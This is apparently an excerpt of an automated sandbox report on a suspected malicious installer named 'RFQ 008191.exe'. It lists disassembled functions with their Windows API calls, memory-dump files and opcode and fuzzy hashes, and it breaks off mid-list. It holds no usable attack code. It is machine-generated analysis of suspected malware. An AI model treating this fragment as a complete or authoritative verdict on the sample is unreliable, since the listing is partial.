                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                    Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                    • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                    • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                    • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                    Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                    • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                    Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                    • wsprintfW.USER32 ref: 00404E17
                                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                    • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                    Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-2382934351
                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                    • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                    • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                    Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                    • GetTickCount.KERNEL32 ref: 0040306F
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                    • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                    Function 00405F18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405EC9
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                    • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405F71
                                                                    • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F81
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 3248276644-2382934351
                                                                    • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                    • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                    • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                    • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                    Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00405569
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                      • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                    • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                    Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: : Completed
                                                                    • API String ID: 3356406503-2954849223
                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                    • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                    • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                    Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Free$GlobalLibrary
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 1100898210-2382934351
                                                                    • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                    • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                    • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                    • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                    Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
